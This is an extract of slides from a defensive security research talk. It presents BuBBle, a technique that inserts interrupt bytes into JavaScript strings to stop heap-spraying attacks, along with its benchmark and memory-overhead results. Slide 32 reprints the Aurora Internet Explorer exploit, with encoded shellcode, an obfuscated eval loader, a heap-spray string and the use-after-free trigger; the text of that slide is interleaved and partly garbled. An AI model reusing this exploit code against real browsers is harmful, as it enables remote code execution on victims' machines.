  23. 23.                                approach Hi. I am a dangerous string to jump into a shellcode <Define  string> Transform Hi. I am a dangerous string to jump into a shellcode <support  data  structure> <Use  string> Restore Hi. I am a dangerous string to jump into a shellcode
  24. 24. BuBBle  approach:  support  data •  Interrupt  array  of  characters •  Change  characters  at  random  positions:  how  many? •  Save  support  data
  25. 25. BuBBle  approach:  support  data •  Interrupt  array  of  characters •  Change  characters  at  random  positions:  how  many? •  Save  support  data ... Value 2nd char Pos. 2nd char Value 1st char Pos. 1st char Num. intervals
  26. 26. BuBBle  approach:  js_Transform() “blah blah blah is a normal string with appended shellcode” rand <- 8 12 rand <- generate_random_position(0,MINLEN) len = 57 len <- string.length() intervals = 2 intervals <- len/MINLEN foreach (i in intervals) pos = MINLEN*i 2 7 a 35 w save_position(pos+rand) save_value(character[pos+rand]) change_value(character[pos + rand]) “blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
  27. 27. BuBBle  approach:  js_Transform() “blah blah blah is a normal string with appended shellcode” rand <- 8 12 rand <- generate_random_position(0,MINLEN) len = 57 len <- string.length() intervals = 2 intervals <- len/MINLEN foreach (i in intervals) pos = MINLEN*i 2 7 a 35 w save_position(pos+rand) save_value(character[pos+rand]) change_value(character[pos + rand]) “blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
  28. 28. BuBBle  approach:  js_Transform() “blah blah blah is a normal string with appended shellcode” rand <- 8 12 rand <- generate_random_position(0,MINLEN) len = 57 len <- string.length() intervals = 2 intervals <- len/MINLEN foreach (i in intervals) pos = MINLEN*i 2 7 a 35 w save_position(pos+rand) save_value(character[pos+rand]) change_value(character[pos + rand]) “blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
  29. 29. BuBBle  approach:  js_Transform() “blah blah blah is a normal string with appended shellcode” rand <- 8 12 rand <- generate_random_position(0,MINLEN) len = 57 len <- string.length() intervals = 2 intervals <- len/MINLEN foreach (i in intervals) pos = MINLEN*i 2 7 a 35 w save_position(pos+rand) save_value(character[pos+rand]) change_value(character[pos + rand]) “blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
  30. 30. BuBBle  approach:  js_Transform() “blah blah blah is a normal string with appended shellcode” rand <- 8 12 rand <- generate_random_position(0,MINLEN) len = 57 len <- string.length() intervals = 2 intervals <- len/MINLEN foreach (i in intervals) pos = MINLEN*i 2 7 a 35 w save_position(pos+rand) save_value(character[pos+rand]) change_value(character[pos + rand]) “blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
  31. 31. BuBBle  approach:   security  evaluation • What?  We  still  spray  the  heap! • Interrupt  procedure  call   (.byte              0xcc)   • IE  and  Aurora  against  Google  (Jan  2010)
  32. 32. Aurora-­‐Google  (1-­‐0) var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, <html><script>var sc = unescape(" 784, 707, 280, 238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, %u9090%u19ebu4b5bu3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d 700, 238, 287, 413, 224, 833, 728, 735, 756, 707, 280, 770, 322, 756, 707, 8%uebfaue805%uffe2%uffffu3931%ud8dbu87d8%u79bcud8e8%ud8d8%u9853%u53d4%uc4a8 770, 721, 812, 728, 420, 427, 371, 350, 364, 350, 392, 392, 287, 224, 770, %u5375%ud0b0%u2f53%ud7b2%u3081%udb59%ud8d8%u3a48%ub020%ueaebud8d8%u8db0%ubd 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686, 805, 812, 798, abu8caau9e53%u30d4%uda37%ud8d8%u3053%ud9b2%u3081%udbb9%ud8d8%u213aub7b0%ud8 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693, b6%ub0d8%uaaadub5b4%u538cud49eu0830%ud8dau53d8%ub230%u81d9%u9a30%ud8dbu3ad8 322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, %ub021%uebb4%ud8eauabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8%u3053%ud9b2%u30 770, 707, 833, 224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 81%udbfbud8d8%u213au3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2%ub 798, 280, 826, 679, 798, 224, 735, 427, 336, 413, 735, 420, 350, 336, 336, 28bu27d8%u9c8eu18ebu5898%udbe4%uadd8%u5121%u485eud8d8%u1fd8%udbdcub984%ubdf 413, 735, 301, 301, 287, 224, 861, 840, 637, 735, 651, 427, 770, 301, 805, 6%u9c1fudcdbubda0%ud8d8%u11ebu8989%u8f8bueb89%u5318%u989eu8630%ud8dau5bd8%u 693, 413, 875); d820%u5dd7%ud9a7%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e5 var arr = new Array; 3%u30fcudae5%ud8d8%u205bud727%u865cud8d9%u51d8%ub89eud8b2%u2788%uf08eu9e51% u3bcu485eud8d8%u1fd8%udbdcuba84%ubdf6%u9c1fudcdbubda0%ud8d8%ud8b2%ud8b2%uda for (var i = 0; i < sss.length; i ++ ){ b2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fcud923%ud8d8%u205bud727%uc45cud8 arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString d9%u51d8%u5c5eud8d8%u51d8%u5446%ud8d8%u53d8%ub89eud8b2%ud8b2%ud8b2%u9e53%u8 ();cc=cc.replace(/ ,/ g, "" 8b8%u8e27%u1fe0%ua89eud8d8%ud8d8%u9e1fud8acud8d8%u59d8%ud81fud8dauebd8%u530 ); 3%uc86%ud8b2%u9e55%u88a8%ud8b0%ud8dcu8fd8%uae27%u27b8%udc8eu11ebud861%ud8dc cc = cc.replace(/@/g, ","); u58d8%ud7a4%u4d27%ud4acua458%u27d7%uacd8%u58ddud7acu4d27%u333au1b53%ud8f5%u eval(cc); d8dcu5bd8%ud820%udba7%u8651%ub2a8%u55d8%uac9eu2788%ua8aeu278fu5c6eud8d8%u27 var x1 = new Array(); d8%ue88eu3359%udcd8%ud8d8%u235bua7d8%u277dub8aeu8e27%u27ecu5c6eud8d8%u27d8% for (i = 0; i < 200; i ++ ){ uec8eu5e53%ud848%ud8d8%u4653%ud854%ud8d8%udc1fu84dbuf6b9%u8bbdu8e27%u53f4%u x1[i] = document.createElement("COMMENT"); 5466%ud8d8%u53d8%u485eud8d8%u1fd8%udfdcuba84%ubdf6%u3459%ud9d8%ud8d8%u0453% x1[i].data = "abc"; ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4%ueb23%ueb18%u59 } 03%ud834%ud8dau53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153%u ; 1b5buebc8%u8818%u8b89%u8888%u8888%u8888%u888fu5388%ud09eu2f30%ud8d8%u53d8%u var e1 = null; e4a6%uec30%ud8d9%u30d8%ud8efud8d8%ubbb0%uafaeub0d8%ub0abub7bcu538cud49eu6e3 function ev1(evt){ 0%ud8d8%u51d8%ue49eu79bcud8dcud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89 e1 = document.createEventObject(evt); eu4230%ud8d8%uebd8%u8b03%u8b8bu278bu3008%ud83dud8d8%u3459%ud9d8%ud8d8%u2453 document.getElementById("sp1").innerHTML = ""; %u1f5bu1fdcueadfu49acu1fd4%udc9fu51bbu9709%u9f1fu78d0%u4fbdu1f13%ud49fu9889 window.setInterval(ev2, 50); %ua762%u9f1fue6c8%u6ec5%u1fe1%ucc9fub160%uc30cu9f1fu66c0%ubea7%u1f78%uc49fu } 7124%u75efu9f1fu40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498%ua853%u75c4%ub053% function ev2(){ u53d0%u512fubc8eudcb2%u3081%ud87bud8d8%u3a48%ub020%ueaebud8d8%u8db0%ubdabu8 caaude53%uca30%ud8d8%u53d8%ub230%u81ddu5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u p = "u0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0d 58dcu30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0acu2753%u538du5534%udd98%u u0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0d 3827%ue030%ud8d8%u1bd8%ue058%u5830%u31e0%uc9adua059%u48ddu4848%uac48%ub03fu u0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0d d2d0%ud8d8%u9855%u27ddu3038%ud8cfud8d8%u301bud8c9%ud8d8%uc960%udcd9%u1a58%u u0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0d d8d4%uda33%u1b80%u2130%u2727%u8327%udf1eu5160%ud987%u1fbeudd9fu3827%u8b1bu0 u0c0du0c0d"; 453%ub28bub098%uc8d8%ud8d8%u538fuf89eu5e30%u2727%u8027%u891bu538eue4aduac53 for (i = 0; i < x1.length; i ++ ){ %ua0f6%u2ddbu538euf8aeu2ddbu11ebu9991%udb75%ueb1dud703%uc866%u0ee2%ud0acu13 x1[i].data = p; 19%udbdfu9802%u2933%uc7e3%u3fadu5386%ufc86%u05dbu53beu93d4%u8653%udbc4%u530 } 5%u53dcu1ddbu8673%u1b81%uc230%u2724%u6a27%u3a2au6a2cud7eeu28cbua390%ueae5%u ; 49acu5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4auc6a8%ubc7cu4b37%u3ceau5 var t = e1.srcElement; 64cud2cbua174%u3ee1%u1c40%uc755%u8faud5beu9b27%u7466%u4003%uc8d2%u5820%u770 } eu2342%ucd8bub0beuacacue2a8%uf7f7%ubdbcub7b5%uf6e9%uacbeub9a8%ubbbbuabbduf6 </script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></ abubbbbubcf7%ub5bd%uf7b7%ubcb9%ub2f6%ubfa8%u00d8"); body></html>
  33. 33. BuBBle:  performance   benchmarks • Macrobenchmarks • Sunspider  Benchmark  Suite • V8   • PeaceKeeper  bench. • Memory  overhead  analysis
  34. 34. Benchmark Perf. Overhead Site URL Perf. overhead Richards 5.6% economist.com 5.6% DeltaBlue 3.6% amazon.com 4.7% Crypto 10% ebay.com 4.2% Ray Trace 1.5% facebook.com 4.9% Early Boyer 3.7% maps.google.com 3.2% RegExp 0.6% docs.google.com 6.3% Splay 1.8% cnn.com 4.8% Total 2.6% V8 Javascript Benchmarks youtube.com 4.9% Average 4.8% Macrobenchmarks Test Perf.Overhead 3d 0.17% bitops 0.89% controlflow 1.44% math 0.62% Benchmark Perf. Overhead regexp 0.23% Rendering 0.5% string Social Networking 0.5% base64 27.3% Complex Graphics 2.2% fasta 1.24% Data 14% tagcloud 2.20% DOM ops. 0.2% unpack 3.24% Text parsing 2.0% validate 9.30% Average 5.19% Total 2.8% Sunspider Javascript Benchmark Suite Peacekeeper Javascript Benchmarks
  35. 35. BuBBle:  memory   overhead • 1/24  changes • n-­‐byte  original  string • i  =  n/24 • support  data  structure   2i  bytes  long • 8.3%  memory  overhead   (theoretical  and  room  for   improvement)
  36. 36. BuBBle:  memory   overhead • 1/24  changes • n-­‐byte  original  string • i  =  n/24 Benchmark Sunspider Mem. Overhead 5.6% • support  data  structure   V8 4.2% 2i  bytes  long Peacekeeper 6.5% • 8.3%  memory  overhead   Average 5.3% Memory overhead analysis from proc file system (theoretical  and  room  for   improvement)
  37. 37. Related  work • ASLR Bhatkar, S., Duvarney, D.C., Sekar, R.: Address obfuscation: An efficient approach to combat a broad range of memory error exploits. Proceedings of the 12th USENIX Security Symposium, Washington, D.C., U.S.A., August 2003 •  DEP Data Execution Prevention: Windows Server 2003 with SP1 • Nozzle   Ratanaworabhan, P., Livshits, B., Zorn, B.: Nozzle: A defense against heap-spraying code injection attacks. Technical report, Microsoft Research (November 2008) • Shellcode  detection   Egele,M.,Wurzinger,P.,Kruegel,C.,Kirda,E.:Defending browsers against drive-by downloads: mitigating heap-spraying code injection attacks. In: Flegel, U., Bruschi, D. (eds.) Detection of Intrusions and Malware, and Vulnerability Assessment. LNCS, vol. 5587, pp. 88– 106. Springer, Heidelberg (2009)
  38. 38. Conclusion • Lightweight    solution(e.g.  Mozilla  Firefox,  Mozilla  Fennec) • Implemented  for  Javascript  strings • Allocation  of  malicious  objects  from  external  media   (mp3,  ...  ) • Future  dev:  protect  arrays  of  integers,  protect  other  engines • Not  just  for  browsers  
  39. 39. ?

×